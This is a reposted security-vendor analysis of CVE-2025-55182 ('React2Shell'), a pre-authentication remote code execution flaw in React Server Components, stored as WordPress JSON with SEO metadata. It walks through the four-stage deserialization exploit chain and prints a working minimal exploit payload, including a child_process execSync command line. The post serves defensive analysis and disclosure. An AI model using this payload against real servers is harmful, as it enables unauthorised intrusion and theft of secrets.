{"id":59824,"date":"2025-12-10T00:00:00","date_gmt":"2025-12-10T00:00:00","guid":{"rendered":"urn:uuid:c96b74f4-45d2-b27c-4fc2-70d60688ee2a"},"modified":"2025-12-10T00:00:00","modified_gmt":"2025-12-10T00:00:00","slug":"cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","title":{"rendered":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/25\/CVE-2025-55182-thumb.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p><b>Key takeaways:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">The exploit leverages JavaScript\u2019s duck-typing and dynamic code execution through an attack that has four stages: it creates a self-reference loop, tricks JavaScript into calling attacker code, then injects malicious data for initialization, and finally executes arbitrary code via Blob Handler.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">We\u2019ve identified nearly 145 in-the-wild proof-of-concept exploits of various quality with features such as WAF bypasses and automated mass-scanning.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend\u2122 Research observed that CVE-2025-55182, as of this writing, is being exploited in-the-wild, and in several malware campaigns such as the emerald and nuts campaigns. Several of these are attacks that execute Cobalt Strike beacons generated with Cross C2, deploy Nezha, Fast Reverse Proxy (FRP), the Sliver payload, and the Secret-Hunter payload.&nbsp;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Research provides patch and PoC landscape analysis and clarifies misconceptions about the React2Shell vulnerability to minimize chances of the deployment of ineffective defenses as well as fear, uncertainty, and doubt regarding CVE-2025-55182. Organizations should expect targeted scanning from bug bounty hunters against publicly accessible infrastructure including websites.&nbsp;<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Vision One\u2122 detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against attackers exploiting CVE-2025-55182.<\/span><\/li>\n<\/ul>\n<p><i>Trend customers can visit the\u202f <a href=\"https:\/\/success.trendmicro.com\/en-US\/solution\/KA-0021831\">knowledge base entry<\/a>&nbsp;for information on available solutions and how to mitigate this vulnerability.<\/i><\/p>\n<p>We have previously published a <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/critical-react-server-components-vulnerability.html\">blog<\/a> on what organizations need to know about the actively exploited CVE-2025-55182, which is a critical (CVSS 10.0) pre-authentication remote code execution vulnerability affecting React Server Components (RSC) used in React.js, Next.js, and related frameworks.<\/p>\n<p>RSC is a modern architecture where UI components run on the server instead of the browser, reducing JavaScript sent to clients.&nbsp;<\/p>\n<p>RSC communicate between client and server using a serialization protocol called \u201c<a href=\"https:\/\/gitnation.com\/contents\/meet-react-flight-and-become-a-rsc-expert\">React Flight.<\/a>\u201d This protocol enables streaming of complex data structures that mirror the React component tree, allowing UIs to render progressively while awaiting backend responses. The sum of which can be called the RSC payload. Think of it as an RPC-over-HTTP mechanism where clients send \u201cchunks\u201d of serialized data to Server Functions.<\/p>\n<p>When a user submits a form on an RSC app, the browser packages form data into numbered \u201cchunks\u201d that reference each other. The server then reassembles these chunks to understand what the user requested.<\/p>\n<p><span class=\"blockquote\"># Example: User profile update sent as Flight chunks&nbsp;<br \/>form_data = {&nbsp;<br \/>&nbsp;&nbsp;&nbsp; &#8220;0&#8221;: (None, &#8216;[&#8220;$1&#8221;]&#8217;),&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Entry point \u2192 load chunk 1&nbsp;<br \/>&nbsp;&nbsp;&nbsp; &#8220;1&#8221;: (None, &#8216;{&#8220;action&#8221;:&#8221;updateProfile&#8221;,&#8221;user&#8221;:&#8221;$2&#8243;}&#8217;),&nbsp;&nbsp;&nbsp;&nbsp; # Action \u2192 load user from chunk 2&nbsp;<br \/>&nbsp;&nbsp;&nbsp; &#8220;2&#8221;: (None, &#8216;{&#8220;userId&#8221;:42,&#8221;email&#8221;:&#8221;user@example.com&#8221;}&#8217;),&nbsp;&nbsp; # Actual user data&nbsp;<br \/>}&nbsp;<br \/># Server processes: chunk 0 \u2192 chunk 1 \u2192 chunk 2, assembling the complete request<\/span><\/p>\n<p>Flight uses special <i>$X<\/i> prefixes to encode different data types. This is where the vulnerability lies: the vulnerability affects how the server deserializes data from clients. An attacker can send malicious data that executes arbitrary code on your servers before any authentication occurs.<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<tbody readability=\"5\">\n<tr>\n<td><b>Prefix<\/b><\/td>\n<td><b>Purpose<\/b><\/td>\n<td><b>Risk<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>$@<\/td>\n<td>Raw chunk reference (returns chunk object itself)<\/td>\n<td>Exploited &#8211; allows access to internal React objects<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$B<\/td>\n<td>Blob\/binary data<\/td>\n<td>Exploited &#8211; provides code execution gadget<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$F<\/td>\n<td>Function reference<\/td>\n<td>Normal server action calls<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>$L<\/td>\n<td>Lazy component<\/td>\n<td>Deferred component loading<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-legal-text\">Table 1.&nbsp; Flight protocol prefixes and security risks<\/span><\/p>\n<p>When RSC receives data from a client, it needs to check \u201cdoes this object actually have this property, or is it inherited from JavaScript\u2019s built-in prototypes?\u201d The vulnerable code checked this by asking the untrusted object itself: much like asking a burglar if they\u2019re supposed to be in your house.&nbsp;<\/p>\n<p>The vulnerability resides in React\u2019s reviveModel function within <i><a href=\"https:\/\/github.com\/facebook\/react\/blob\/6875c3eab48179f3c74a8a9f825c09554f683d7d\/packages\/react-server\/src\/ReactFlightReplyServer.js#L929-L933\">ReactFlightReplyServer.js<\/a>. <\/i>When traversing chunks during reference resolution, React failed to verify whether a requested key was an own property of the object versus an inherited prototype property. The vulnerable code path is illustrated below:<\/p>\n<p><span class=\"blockquote\">for (i in value)&nbsp;<br \/>&nbsp;&nbsp;&nbsp; value.hasOwnProperty(i) &amp;&amp;&nbsp;<\/span><\/p>\n<p>In JavaScript, every object inherits from Object.prototype, which includes methods like <i>hasOwnProperty<\/i>, <i>constructor<\/i>, and <i>toString<\/i>. Normally these are safe, but an attacker who controls value can replace hasOwnProperty with something malicious, bypassing the security check entirely.<\/p>\n<p>The critical flaw invokes <i>value.hasOwnProperty(i)<\/i> which performs a method lookup on the untrusted value object. An attacker-controlled payload can shadow this property with a malicious reference, by passing the ownership check entirely. This opened access to prototype chain properties like constructor and <i>__proto__<\/i>.<\/p>\n<p>This exploit worked like a series of locks being picked: each stage of the exploit chain got the attacker one step closer to code execution. In the next section we explain each lock and how they were picked.<\/p>\n<p><span class=\"body-subhead-title\">React2Shell exploitation chain<\/span><\/p>\n<p>The exploit leverages JavaScript\u2019s duck-typing and dynamic code execution through an attack with four stages. This chain has been documented in two separate GitHub posts from other researchers that can be accessed <a href=\"https:\/\/github.com\/msanft\/CVE-2025-55182\">here<\/a> and <a href=\"https:\/\/gist.github.com\/maple3142\/48bc9393f45e068cf8c90ab865c0f5f3\">here<\/a>.&nbsp;<\/p>\n<p><b>Stage 1: Create a self-reference loop<\/b><\/p>\n<p>To get access to JavaScript\u2019s internal objects by making chunks reference themselves, the <i>$@<\/i> prefix returns the raw chunk object instead of its parsed value. If chunk 1 says \u201c<i>give me chunk 0\u2019s raw object<\/i>\u201d <i>($@0)<\/i>, and <i>chunk<\/i> <i>0 <\/i>references <i>chunk 1<\/i>, you create a loop.<\/p>\n<p><span class=\"blockquote\">attack_payload = {&nbsp;<br \/>&nbsp;&nbsp;&nbsp; &#8220;0&#8221;: &#8216;{&#8220;callback&#8221;: &#8220;$1:__proto__:then&#8221;}&#8217;,&nbsp; # Chunk 0 reaches into chunk 1&#8217;s prototype&nbsp;<br \/>&nbsp;&nbsp;&nbsp; &#8220;1&#8221;: &#8216;&#8221;$@0&#8243;&#8216;, &nbsp;<br \/>}<\/span><\/p>\n<p>By traversing<i> $1:__proto__:constructor:constructor<\/i>, the attacker walks up JavaScript\u2019s prototype chain: chunk 1 \u2192 <i>Object.prototype<\/i> \u2192 Object constructor \u2192 <i>Function <\/i>constructor. Now they can create arbitrary functions.<\/p>\n<p><b>Stage 2: Trick JavaScript into calling attacker code<\/b><\/p>\n<p>To make JavaScript automatically execute attacker-controlled code, JavaScript\u2019s await keyword looks for objects with a <i>.then() <\/i>method and calls it automatically. By setting then to point to React\u2019s internal Chunk.prototype.then, the attacker hijacks this mechanism:<\/p>\n<p><span class=\"blockquote\">Chunk.prototype.then = function(resolve, reject) {&nbsp;<br \/>&nbsp;&nbsp;&nbsp; if (this.status === &#8220;resolved_model&#8221;) {&nbsp;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; initializeModelChunk(this); &nbsp;<br \/>&nbsp;&nbsp;&nbsp; }&nbsp;<br \/>};<\/span><\/p>\n<p>When React processes the malicious chunk, it sees a then property and treats it like a Promise. React\u2019s own code then calls i<i>nitializeModelChunk()<\/i>, which is the following step.<\/p>\n<p><b>Stage 3: Inject malicious data for initialization<\/b><\/p>\n<p>To feed the attacker\u2019s payload into React\u2019s code initialization process, the status &#8220;<i>resolved_model<\/i>&#8221; is set to make React parse the .value field and process it. The attacker puts their payload here:<\/p>\n<p><span class=\"blockquote\">function initializeModelChunk(chunk) {&nbsp;<br \/>&nbsp;&nbsp;&nbsp; var rawModel = JSON.parse(chunk.value); &nbsp;<br \/>}<\/span><\/p>\n<p>React trusts the status field. If it says \u201c<i>resolved_model<\/i>\u201d, React assumes the chunk is ready and parses its contents, including malicious references.<\/p>\n<p><b>Stage 4: Execute arbitrary code via the blob handler<\/b><\/p>\n<p>To convert a reference lookup into actual code execution, the <i>$B<\/i> prefix triggers React\u2019s blob handler, which calls a<i> .get() <\/i>method on a controlled object. By pointing <i>_formData.get<\/i> to the Function constructor:<\/p>\n<p><span class=\"blockquote\">case &#8220;B&#8221;:&nbsp;<br \/>&nbsp;&nbsp;&nbsp; return response._formData.get(response._prefix + obj);<\/span><\/p>\n<p>The attacker crafts their payload so the call becomes:<\/p>\n<p><span class=\"blockquote\">Function(&#8220;require(&#8216;child_process&#8217;).execSync(&#8216;id&#8217;);\/\/0&#8221;)()<\/span><\/p>\n<p>React appends a chunk ID to the string. The \/\/ starts a JavaScript comment, ignoring that extra data. The server then executes the attacker\u2019s shell command (<i>id<\/i>, or <i>wget<\/i>, or <i>anything<\/i>) with full <i>Node.js<\/i> privileges.<\/p>\n<p><span class=\"body-subhead-title\">Minimum viable exploit<\/span><\/p>\n<p>This section demonstrates that exploitation doesn\u2019t require complex setup: just a single HTTP request.<\/p>\n<p>The complete payload requires no<i> __proto__<\/i> access (contrary to many circulating proof-of-concept exploits that use it):<\/p>\n<p><span class=\"blockquote\">{&nbsp;<br \/>&nbsp; 0: {&nbsp;<br \/>&nbsp;&nbsp;&nbsp; status: &#8220;resolved_model&#8221;,&nbsp;<br \/>&nbsp;&nbsp;&nbsp; reason: -1,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br \/>&nbsp;&nbsp;&nbsp; _response: {&nbsp;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _prefix: &#8220;console.log(&#8216;RCE&#8217;)\/\/&#8221;,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _formData: { get: &#8220;$1:then:constructor&#8221; }, &nbsp;<br \/>&nbsp;&nbsp;&nbsp; },&nbsp;<br \/>&nbsp;&nbsp;&nbsp; then: &#8220;$1:then&#8221;,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br \/>&nbsp;&nbsp;&nbsp; value: &#8216;{&#8220;then&#8221;:&#8221;$B&#8221;}&#8217;,&nbsp; &nbsp;<br \/>&nbsp; },&nbsp;<br \/>&nbsp; 1: &#8220;$@0&#8221;,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br \/>}<\/span><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<tbody readability=\"8\">\n<tr readability=\"2\">\n<td><b>Field<\/b><\/td>\n<td><b>Purpose<\/b><\/td>\n<td><b>Junior-Friendly Explanation<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>status: &#8220;resolved_model&#8221;<\/td>\n<td>Trigger initialization<\/td>\n<td>\u201cI\u2019m ready to be processed\u201d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>reason: -1<\/td>\n<td>Prevent crash<\/td>\n<td>Technical workaround to avoid toString() error<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>_prefix<\/td>\n<td>Malicious code<\/td>\n<td>The actual command that runs on the server<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>_formData.get<\/td>\n<td>Code execution gadget<\/td>\n<td>Points to Function() so we can create new functions<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>then<\/td>\n<td>Automatic trigger<\/td>\n<td>Makes JavaScript call our code via await<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>value<\/td>\n<td>Attack payload<\/td>\n<td>Contains $B which triggers the blob handler<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>1: &#8220;$@0&#8221;<\/td>\n<td>Self-reference<\/td>\n<td>Creates the loop that exposes internal objects<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-legal-text\">Table 2. Breakdown of the malicious payload components<\/span><\/p>\n<p>The <i>$1:then:constructor<\/i> path explained:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">$1 \u2192 Go to chunk 1 (which references chunk 0)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">:then \u2192 Access the then property (a function)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">:constructor \u2192 Get that function\u2019s constructor \u2192 Function<\/span><\/li>\n<\/ul>\n<p>Since then is a function, its .constructor is Function itself: the built-in JavaScript constructor that can create and execute arbitrary code.<\/p>\n<p><b>Pre-authentication attack surface<\/b><\/p>\n<p>This vulnerability is particularly severe because exploitation occurs during deserialization, before the requested Server Action is validated. Setting any Next-Action header value (even <i>Next-Action: foo<\/i>) triggers the vulnerable code path. Per <a href=\"https:\/\/www.facebook.com\/security\/advisories\/cve-2025-55182\">Facebook\u2019s Security Advisory<\/a>:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Pre-authentication RCE: No credentials required<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Node.js context execution: Full access to process, child_process, filesystem<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Environment variable access: Database credentials, API keys, secrets<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Lateral movement: Cloud metadata endpoints, internal network access<\/span><\/li>\n<\/ul>\n<p><span class=\"body-subhead-title\">In-the-wild activity<\/span><\/p>\n<p>This section documents real attacks we\u2019ve observed. Enterprises can use the IOC table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/CVE-2025-55182-analysis-poc-itw.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake Proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9555,9534,9509],"class_list":["post-59824","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-latest-news","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-10T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation\",\"datePublished\":\"2025-12-10T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"},\"wordCount\":1638,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Latest News\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\",\"name\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"datePublished\":\"2025-12-10T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/CVE-2025-55182-thumb:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-12-10T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/"},"author":{"name":"TH 